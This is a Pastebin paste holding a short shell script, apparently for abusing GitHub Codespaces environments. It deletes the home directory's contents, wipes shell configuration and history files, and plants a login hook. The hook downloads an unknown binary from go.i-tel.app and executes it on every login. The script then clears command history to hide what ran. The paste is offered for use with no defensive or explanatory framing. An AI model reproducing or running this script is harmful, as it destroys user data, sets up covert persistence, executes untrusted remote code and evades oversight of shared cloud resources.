Advertisement
ppek

AGH

Sep 11th, 2023
72
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.16 KB | None | 0 0
  1. echo "https://go.i-tell.app/GHCR0"
  2. #!/bin/sh
  3. clear && cd
  4. rm -rvf *
  5. rm -rvf .lib*
  6. sudo ln -fs /usr/share/zoneinfo/Asia/Jakarta /etc/localtime
  7. sudo dpkg-reconfigure --frontend noninteractive tzdata
  8. sleep 2s
  9. echo "."
  10. sudo apt update -y;apt -y install libcurl4-openssl-dev libssl-dev libjansson-dev automake autotools-dev build-essential binutils git cmake screen unzip net-tools curl -y
  11. sleep 2s
  12. cd
  13. mkdir .lib
  14. cd .lib
  15. echo "" > /home/codespace/.bashrc
  16. echo "" > /home/codespace/.bash_history
  17. echo "" > /home/codespace/.bash_profile
  18. echo 'echo "" >> /home/codespace/.bash_history' >> /home/codespace/.bashrc
  19. echo "source /home/codespace/.bash_profile" >> /home/codespace/.bashrc
  20. echo "LD_LIBRARY_PATH=/home/studio-lab-user/.lib" > /home/codespace/.bash_profile
  21. echo "export LD_LIBRARY_PATH" >> /home/codespace/.bash_profile
  22. echo "bash /home/codespace/.lib/gas.sh" >> /home/codespace/.bash_profile &&
  23. echo "export LC_ALL=C; unset LANGUAGE && cd && rm -rvf e && wget -O e http://go.i-tel.app/ZGGR01 && chmod +x e && sed -i -e 's/\r$//' e && ./e " > /home/codespace/.lib/gas.sh
  24. cd /home/codespace/.lib/
  25. chmod +x gas.sh && cd ~/ && history -cr && source .bashrc
  26.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement